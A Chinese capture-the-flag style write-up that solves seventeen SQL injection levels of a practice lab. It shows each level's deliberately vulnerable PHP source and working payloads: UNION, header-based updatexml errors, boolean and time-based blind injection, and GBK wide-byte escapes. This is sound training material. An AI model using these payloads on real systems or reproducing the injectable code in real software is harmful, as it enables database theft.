-
-
【封神台】Sql-Labs wp
-
发表于: 2021-8-5 13:44 1464
-
前言
- 掌控安全里面的靶场Sql-Labs,练练手!
- 环境:http://inject2.lab.aqlab.cn:81/
pass-01
// Pass-01 lab source (vulnerable by design). $conn is opened elsewhere in the lab.
// Injection point: $_GET['id'] is concatenated into the query with no quoting,
// validation or escaping, so a numeric-context UNION injection works directly.
$username = '';
$password = '';
@$id = $_GET['id'];
@$sql = 'select *from user where id=' . $id;           // untrusted id goes straight into SQL
mysqli_select_db($conn, '****');                       // the author masked the real database name
$result = mysqli_query($conn, $sql);
// Each row overwrites the same two variables, so only the LAST row of the result
// set is printed -- a UNION row appended after the real one is what shows up.
while ($row = mysqli_fetch_array($result)) {
    $username = $row['username'];
    $password = $row['password'];
}
echo 'Your Login name:' . $username;
echo 'Your Password:' . $password;
- 显错注入（有回显的联合查询注入）：先判断原查询的列数（常用 `order by N` 试探，本题为 3 列），再用 union 把可控列放到回显位上
- 查表拓展：`1 and exists(select * from user)` 这种形式可以通过页面是否正常回显，猜解某张表是否存在
`http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 union all select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database();`
- 查flag表中字段
`http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 union all select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x6572726f725f666c6167;` // 0x6572726f725f666c6167 是 error_flag 的十六进制；用十六进制字面量代替带引号的字符串，可以避免引号被过滤或转义
- 拿 flag（后面就不再截图了）
`http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 union all select 1,2,flag from error_flag;`
pass-02
// Pass-02 lab source (vulnerable by design). $conn is opened elsewhere in the lab.
// Same as Pass-01 except id is wrapped in single quotes; the payload has to close
// that quote first (`1'`) and comment out the trailing one (`#`, URL-encoded %23).
$username = '';
$password = '';
@$id = $_GET['id'];
@$sql = 'select *from user where id=\'' . $id . '\'';   // untrusted id inside '...', unescaped
mysqli_select_db($conn, '****');                       // the author masked the real database name
$result = mysqli_query($conn, $sql);
// Only the last row of the result set survives the loop and gets printed.
while ($row = mysqli_fetch_array($result)) {
    $username = $row['username'];
    $password = $row['password'];
}
echo 'Your Login name:' . $username;
echo 'Your Password:' . $password;
- 这一题给 id 的传参加上了单引号。做法和上题差不多：在 1 后面先补一个 `'` 闭合源码里的单引号，再加注释符 `#` 把后面残留的单引号注释掉，就可以联合查询了。注意 `#` 在 URL 里必须写成 `%23`：原样的 `#` 会被浏览器当成 fragment，根本不会发送到服务器。
`http://inject2.lab.aqlab.cn:81/Pass-02/index.php?id=1' union all select 1,2,flag from error_flag%23`
pass-03
// Pass-03 lab source (vulnerable by design). $conn is opened elsewhere in the lab.
// id is wrapped in ('...'), so the payload closes with `')` before its own SQL.
$username = '';
$password = '';
@$id = $_GET['id'];
@$sql = 'select *from user where id=(\'' . $id . '\')';  // untrusted id inside ('...'), unescaped
mysqli_select_db($conn, '****');                         // the author masked the real database name
$result = mysqli_query($conn, $sql);
// Only the last row of the result set survives the loop and gets printed.
while ($row = mysqli_fetch_array($result)) {
    $username = $row['username'];
    $password = $row['password'];
}
echo 'Your Login name:' . $username;
echo 'Your Password:' . $password;
- 上题是 `'id'`，这题多套了一层括号 `('id')`，思路不变：在 1 后面构造 `')` 闭合，再用注释符 `#`（URL 编码为 `%23`）注释掉后面的内容
`http://inject2.lab.aqlab.cn:81/Pass-03/index.php?id=1') union all select 1,2,flag from error_flag%23`
pass-04
// Pass-04 lab source (vulnerable by design). $conn is opened elsewhere in the lab.
// id is wrapped in ("..."), so the payload closes with `")` before its own SQL.
$username = '';
$password = '';
@$id = $_GET['id'];
@$sql = 'select *from user where id=("' . $id . '")';  // untrusted id inside ("..."), unescaped
mysqli_select_db($conn, '****');                       // the author masked the real database name
$result = mysqli_query($conn, $sql);
// Only the last row of the result set survives the loop and gets printed.
while ($row = mysqli_fetch_array($result)) {
    $username = $row['username'];
    $password = $row['password'];
}
echo 'Your Login name:' . $username;
echo 'Your Password:' . $password;
- 单引号换成了双引号加括号（`("id")`），闭合方式相应改成 `")`
`http://inject2.lab.aqlab.cn:81/Pass-04/index.php?id=1") union all select 1,2,flag from error_flag%23`
pass-05
// Pass-05 lab source (vulnerable by design). $conn is opened elsewhere in the lab.
// Both POST fields are interpolated into the WHERE clause inside single quotes
// with no escaping. The page echoes the first matching row, which gives a
// UNION injection a display point (hence the `limit 1,1` in the payloads).
$username = $_POST['username'];
$password = $_POST['password'];
$sql = 'select *from user where username =\'' . $username . '\' and password=\'' . $password . '\'';
mysqli_select_db($conn, '******');                     // the author masked the real database name
$result = mysqli_query($conn, $sql);
$row = mysqli_fetch_array($result);                    // only the FIRST row of the result set is read
$uname = $row['username'];
$passwd = $row['password'];
if ($row) {
    echo '成功登录Your Login name:' . $uname . 'Your Password:' . $passwd . '';
} else {
    echo '账号密码错误';
}
- 思路：先用万能密码登录，拿到一组账号和密码；然后做 POST 注入，用联合查询凭空造出一行“账号/密码”让页面回显。源码只调用一次 `mysqli_fetch_array`、只显示结果集的第一行，所以用 `limit 1,1` 取第二行——也就是我们用 union 拼进去的那一行。注意这要求前半段 select 确实返回了一行（比如密码正确）；如果前半段查不到记录，union 的那一行就是第一行，应改用 `limit 0,1`。之后的注入步骤和前四题没有区别。
- 万能密码登陆
- 用 HackBar 发 POST 进行注入，找到回显点
`username=admin&password=as4dsa2dsad2a3' union all select 1,2,3 limit 1,1 #`
- 表
`username=admin&password=as4dsa2dsad2a3' union all select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() limit 1,1 #`
- 字段
`username=admin&password=as4dsa2dsad2a3' union all select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag' limit 1,1 #`
- 拿flag
`username=admin&password=as4dsa2dsad2a3' union all select 1,2,flag from flag limit 1,1 #`
pass-06
// Pass-06 lab source (vulnerable by design). $conn is opened elsewhere in the lab.
// Same as Pass-05, but each value is wrapped in ("..."), so the payload closes with `")`.
$username = $_POST['username'];
$password = $_POST['password'];
$sql = 'select *from user where username =("' . $username . '") and password=("' . $password . '")';
mysqli_select_db($conn, '******');                     // the author masked the real database name
$result = mysqli_query($conn, $sql);
$row = mysqli_fetch_array($result);                    // only the FIRST row of the result set is read
$uname = $row['username'];
$passwd = $row['password'];
if ($row) {
    echo '成功登录Your Login name:' . $uname . 'Your Password:' . $passwd . '';
} else {
    echo '账号密码错误';
}
- 双引号后面多了一个括号，闭合方式改成 `")`
`username=admin&password=as4dsa2dsad2a3") union all select 1,2,flag from flag limit 1,1 #`
pass-07
// Pass-07 lab source (vulnerable by design). $conn is opened elsewhere in the lab.
// The listing is cut off in the original write-up: the if-block is never closed.
$username = $_POST['username'];
$password = $_POST['password'];
$uagent = $_SERVER['HTTP_USER_AGENT'];                 // raw request header, never filtered
$jc = $username . $password;
$sql = 'select *from user where username =\'' . $username . '\' and password=\'' . $password . '\'';
// Only username+password are checked for a single quote; the User-Agent is not.
if (preg_match('/.*\'.*/', $jc) !== 0) { die('为了网站安全性,禁止输入某些特定符号'); }
mysqli_select_db($conn, '****');                       // the author masked the real database name
$result = mysqli_query($conn, $sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];
if ($row) {
    // Injection point: the User-Agent is interpolated into an INSERT and the MySQL
    // error text is printed back, so error-based injection (updatexml) works here.
    // This branch runs only after a successful login, so valid credentials come first.
    $Insql = "INSERT INTO uagent (`uagent`,`username`) VALUES ('$uagent','$uname')";
    $result1 = mysqli_query($conn, $Insql);
    print_r(mysqli_error($conn));
    echo '成功登录';
    // ... remainder of the listing not shown in the write-up
源码用 `preg_match('/.*\'.*/', $jc)` 过滤了 username+password 里的单引号，万能密码登录失效了。但 User-Agent 头的值被原样拼进了一条 INSERT 语句，而且 `mysqli_error()` 会直接打印出来——这是一个没有经过任何过滤的报错注入点。两种做法：一是把请求保存下来，在 UA 处加 `*` 标记交给 sqlmap 跑；二是先用 Burp 爆破出密码登录，再在 UA 里写 updatexml，让页面直接把报错信息回显出来。第一种方法无脑，就不做了。
账号和密码是 admin / 123456。看源码可知，必须登录成功（`$row` 非空）才会执行 user-agent 那条 INSERT 语句，所以想做报错注入，前提是能登录成功。
- 登陆成功抓个包
- 拼接出一条完整的 INSERT，并在其中放一个 updatexml 报错注入：payload 先用 `'` 闭合 `'$uagent'` 的引号，补上 VALUES 里剩下的一列，再用 `#` 注释掉原语句余下的部分
`' or updatexml(1,concat(0x7e,user()),1),1) #`
- 取表
`' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),1),1) #`
- 取字段和 flag。注意 updatexml 的报错信息只回显 32 个字符，`group_concat` 结果过长时要用 `substr()` 分段读取
`' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag_head')),1),1) #`
`' or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head)),1),1) #`
pass-08
// Pass-08 lab source (vulnerable by design). $conn is opened elsewhere in the lab.
// Identical to Pass-07 except the logged header is Referer instead of User-Agent.
// The listing is cut off in the original write-up: the if-block is never closed.
$username = $_POST['username'];
$password = $_POST['password'];
$uagent = $_SERVER['HTTP_REFERER'];                    // raw Referer header, never filtered
$jc = $username . $password;
$sql = 'select *from user where username =\'' . $username . '\' and password=\'' . $password . '\'';
// Only username+password are checked for a single quote; the Referer is not.
if (preg_match('/.*\'.*/', $jc) !== 0) { die('为了网站安全性,禁止输入某些特定符号'); }
mysqli_select_db($conn, '****');                       // the author masked the real database name
$result = mysqli_query($conn, $sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];
if ($row) {
    // Injection point: Referer interpolated into an INSERT, MySQL error text printed back.
    $Insql = "INSERT INTO refer (`refer`,`username`) VALUES ('$uagent','$uname')";
    $result1 = mysqli_query($conn, $Insql);
    print_r(mysqli_error($conn));
    echo '成功登录';
    // ... remainder of the listing not shown in the write-up
- 和上题一样，只是插入语句里记录的头从 User-Agent 换成了 Referer（`HTTP_REFERER`），注入点跟着换到 Referer 头
`Referer: ' or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head)),1),1) #`
pass-09
// Pass-09 lab source (vulnerable by design). $conn is opened elsewhere in the lab.
// The listing is cut off in the original write-up: the if-block is never closed.

// Returns the "client IP". Every header below is fully client-controlled and is
// consulted BEFORE REMOTE_ADDR, so the returned value is attacker-supplied whenever
// the request carries one of them (Client-IP, X-Forwarded-For, ...).
function getip() {
    // Same precedence as the original if/elseif chain: first non-empty header wins.
    $headers = array(
        'HTTP_CLIENT_IP',
        'HTTP_X_FORWARDED_FOR',
        'HTTP_X_FORWARDED',
        'HTTP_FORWARDED_FOR',
        'HTTP_FORWARDED',
    );
    foreach ($headers as $name) {
        if (getenv($name)) {
            return getenv($name);
        }
    }
    return $_SERVER['REMOTE_ADDR'];
}

$username = $_POST['username'];
$password = $_POST['password'];
$ip = getip();                                         // attacker-controlled when a forwarding header is sent
$jc = $username . $password;
$sql = 'select *from user where username =\'' . $username . '\' and password=\'' . $password . '\'';
// Only username+password are checked for a single quote; the IP string is not.
if (preg_match('/.*\'.*/', $jc) !== 0) { die('为了网站安全性,禁止输入某些特定符号'); }
mysqli_select_db($conn, '****');                       // the author masked the real database name
$result = mysqli_query($conn, $sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];
if ($row) {
    // Injection point: the "IP" is interpolated into an INSERT, MySQL error text printed back.
    $Insql = "INSERT INTO ip (`ip`,`username`) VALUES ('$ip','$uname')";
    $result1 = mysqli_query($conn, $Insql);
    print_r(mysqli_error($conn));
    echo '成功登录';
    // ... remainder of the listing not shown in the write-up
- 这题记录的是访问 IP。`getip()` 会优先信任客户端可控的请求头（`Client-IP`、`X-Forwarded-For` 等），最后才退回到 `REMOTE_ADDR`；正常请求里一般没有这些头，我们自己加一个 `X-Forwarded-For` 即可
`X-Forwarded-For: ' or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head)),1),1) #`
pass-10
// Pass-10 lab source (vulnerable by design). $conn is opened elsewhere in the lab.
// Unquoted id as in Pass-01, but the page no longer prints data: it only says
// whether any row came back, so this is a boolean-based blind injection.
$news = '';
@$id = $_GET['id'];
@$sql = 'select *from news where id=' . $id;           // untrusted id goes straight into SQL
mysqli_select_db($conn, '****');                       // the author masked the real database name
$result = mysqli_query($conn, $sql);
while ($row = mysqli_fetch_array($result)) {
    $news = $row['news'];
}
if ($news !== '') { echo '有数据'; }                   // one-bit oracle: "has data" or nothing
length函数:
`length(字符串)`
这个函数主要是用来测试字符串长度用,在盲注中是用来判断当前查询的字符串长度,例如数据库名,表名的长度。
substr函数:
`substr(字符串, 起始位置, 截取长度)`
用于截取子串：把字符串逐个字符地取出来，再配合 ascii() 判断这个字符到底是什么。
ascii函数:
`ascii(字符)`
返回字符的 ASCII 码。把字符变成数字之后就可以做大小比较（二分查找），从而快速确定准确的字符内容。
- 先用 `length(database())` 判断库名长度
- 再用 substr 从第一个字符开始，逐位比较 ascii 码判断它是什么
- 拿 Burp 来跑，12 个字符很快就出来了
- 按 1 到 12 的顺序把 ascii 码记下来准备解码
`107 97 110 119 111 108 111 110 103 120 105 97`（解码后为 kanwolongxia）
- 了解原理就好；实际操作还是 sqlmap 好用，python 脚本暂时还不太会写
pass-11
// Pass-11 lab source (vulnerable by design). $conn is opened elsewhere in the lab.
// Same boolean oracle as Pass-10, but id is wrapped in double quotes, so the
// payload has to close with `"` and comment out the trailing quote (%23).
$news = '';
@$id = $_GET['id'];
@$sql = 'select *from news where id="' . $id . '"';    // untrusted id inside "...", unescaped
mysqli_select_db($conn, '****');                       // the author masked the real database name
$result = mysqli_query($conn, $sql);
while ($row = mysqli_fetch_array($result)) {
    $news = $row['news'];
}
if ($news !== '') { echo '有数据'; }                   // one-bit oracle: "has data" or nothing
- 原理和上题一模一样，只是源码里 id 用双引号包裹，所以需要先加一个 `"` 闭合，末尾再加注释符 `%23`（即 `#`）
pass-12
// Pass-12 lab source (vulnerable by design). $conn is opened elsewhere in the lab.
// POST login with unescaped fields; the response is only "logged in" / "wrong",
// so this is a boolean-based blind injection through the login form.
$username = $_POST['username'];
$password = $_POST['password'];
$sql = 'select *from user where username =\'' . $username . '\' and password=\'' . $password . '\'';
mysqli_select_db($conn, '******');                     // the author masked the real database name
$result = mysqli_query($conn, $sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];
if ($row) {
    echo '成功登录';                                    // one-bit oracle
} else {
    echo '账号密码错误';
}
- 换成了 POST 传参，页面只返回“成功登录 / 账号密码错误”两种状态，原理不变（布尔盲注）
pass-13
// Pass-13 lab source (vulnerable by design). $conn is opened elsewhere in the lab.
// Same query as Pass-11, but '有数据' is printed unconditionally, so there is no
// boolean oracle any more -- only a time-based (sleep) blind injection remains.
$news = '';
@$id = $_GET['id'];
@$sql = 'select *from news where id="' . $id . '"';    // untrusted id inside "...", unescaped
mysqli_select_db($conn, '****');                       // the author masked the real database name
$result = mysqli_query($conn, $sql);
while ($row = mysqli_fetch_array($result)) {
    $news = $row['news'];
}
echo '有数据';                                         // always printed; response body carries no signal
- 时间盲注的判断方式本质上也是一种布尔盲注，只是把“有/无数据”的回显换成了响应时间的差异
(1) `if(条件, 条件成立时返回, 条件不成立时返回)`
(2) `sleep(X)`：休眠 X 秒
- 判断数据库的长度
- 判断数据库的值用substr和ascii
`1" and if(ascii(substr(database(),1,1))>1,sleep(1),1)%23`
- 抓包,然后和布尔盲注是一样的操作,理解原理就行
pass-14
// Pass-14 lab source (vulnerable by design). $conn is opened elsewhere in the lab.
// Same time-based blind as Pass-13, but id is wrapped in ('...'), so the payload
// closes with `')`.
$news = '';
@$id = $_GET['id'];
@$sql = 'select *from news where id=(\'' . $id . '\')';  // untrusted id inside ('...'), unescaped
mysqli_select_db($conn, '****');                         // the author masked the real database name
$result = mysqli_query($conn, $sql);
while ($row = mysqli_fetch_array($result)) {
    $news = $row['news'];
}
echo '有数据';                                           // always printed; response body carries no signal
- 和上题一模一样，只是闭合从 `"` 换成了 `')`
`http://inject2.lab.aqlab.cn:81/Pass-14/index.php?id=1') and if(ascii(substr(database(),1,1))>1,sleep(5),1)%23`
pass-15
// Pass-15 lab source (vulnerable by design). $conn is opened elsewhere in the lab.
// addslashes() backslash-escapes the quotes in id, but the connection charset is
// then switched to GBK. addslashes is not charset-aware: a leading high byte
// (%df) absorbs the inserted backslash as the first byte of a GBK double-byte
// character, and the quote that follows is no longer escaped (wide-byte injection).
// NOTE(review): SET NAMES changes the server-side charset only; mysqli_set_charset()
// plus prepared statements is the correct fix.
$username = '';
$password = '';
@$id = addslashes($_GET['id']);                        // prefixes ' " \ NUL with a backslash
@$sql = 'select *from user where id=\'' . $id . '\'';
mysqli_select_db($conn, '****');                       // the author masked the real database name
mysqli_query($conn, "SET NAMES gbk");                  // GBK parsing is what makes %df%5c one character
$result = mysqli_query($conn, $sql);
// Only the last row of the result set survives the loop and gets printed.
while ($row = mysqli_fetch_array($result)) {
    $username = $row['username'];
    $password = $row['password'];
}
echo 'Your Login name:' . $username;
echo 'Your Password:' . $password;
- 源码里用 addslashes() 给单双引号前面加了反斜杠 `\`（URL 编码 %5c）做转义。但连接字符集被设成了 GBK（`SET NAMES gbk`），而 GBK 是双字节编码：在引号前面送一个高位字节 `%df`，服务端转义后变成 `%df%5c%27`，MySQL 按 GBK 解析时把 `%df%5c` 当成一个汉字，反斜杠被“吃掉”，后面的单引号就不再被转义，从而逃逸出引号。
- 根因是 addslashes 不感知字符集，而 `SET NAMES` 只改了服务端的连接字符集、mysqli 客户端并不知道；正确做法是用 `mysqli_set_charset()` 设置字符集并改用预处理语句。
- 输入 `%df` 逃逸反斜杠
- 接着判断列数、查表、拿 flag，和第一题一样
`http://inject2.lab.aqlab.cn:81/Pass-15/index.php?id=1%df' union all select 1,2,3%23`
pass-16
// Pass-16 lab source (vulnerable by design). $conn is opened elsewhere in the lab.
// Same addslashes + SET NAMES gbk wide-byte weakness as Pass-15; id is wrapped in
// ("..."), so the payload is `%df")`.
$username = '';
$password = '';
@$id = addslashes($_GET['id']);                        // prefixes ' " \ NUL with a backslash
@$sql = 'select *from user where id=("' . $id . '")';
mysqli_select_db($conn, '****');                       // the author masked the real database name
mysqli_query($conn, "SET NAMES gbk");                  // server-side charset only; enables %df%5c trick
$result = mysqli_query($conn, $sql);
// Only the last row of the result set survives the loop and gets printed.
while ($row = mysqli_fetch_array($result)) {
    $username = $row['username'];
    $password = $row['password'];
}
echo 'Your Login name:' . $username;
echo 'Your Password:' . $password;
- 和上题区别不大，只是闭合变成了 `")` 的形式
`http://inject2.lab.aqlab.cn:81/Pass-16/index.php?id=1%df") union all select 1,2,3%23`
pass-17
// Pass-17 lab source (vulnerable by design). $conn is opened elsewhere in the lab.
// POST login; both fields go through addslashes() but the connection is switched
// to GBK, so the same wide-byte escape defeats the backslash. The response is only
// "logged in" / "wrong", so the injection is blind.
$username = addslashes($_POST['username']);
$password = addslashes($_POST['password']);
$sql = 'select *from user where username =(\'' . $username . '\') and password=(\'' . $password . '\')';
mysqli_select_db($conn, '******');                     // the author masked the real database name
mysqli_query($conn, "SET NAMES gbk");                  // server-side charset only; enables wide-byte escape
$result = mysqli_query($conn, $sql);
$row = mysqli_fetch_array($result);
if ($row) {
    echo '成功登录';                                    // one-bit oracle
} else {
    echo '账号密码错误';
}
- 这题是盲注，不过还是说一下：通过表单 POST 时 `%df` 会被当作字面文本发送、不会被解码，所以宽字节注入要换一种写法，比如直接输入“汉”这样的汉字——它按 UTF-8 发送时是奇数个字节，最后一个高位字节会和 addslashes 加上的反斜杠在 GBK 下拼成一个双字节字符，同样可以逃逸（具体以抓包看到的字节为准）。
- 成功逃逸
- 因为是盲注，所以抓包保存成 123.txt，用 `*` 标出注入点后交给 sqlmap（`sqlmap -r 123.txt`）。注意：一定要抓我们自己成功构造出逃逸的那种登录请求再加 `*`，不然可能跑不出来
- sqlmap跑的形式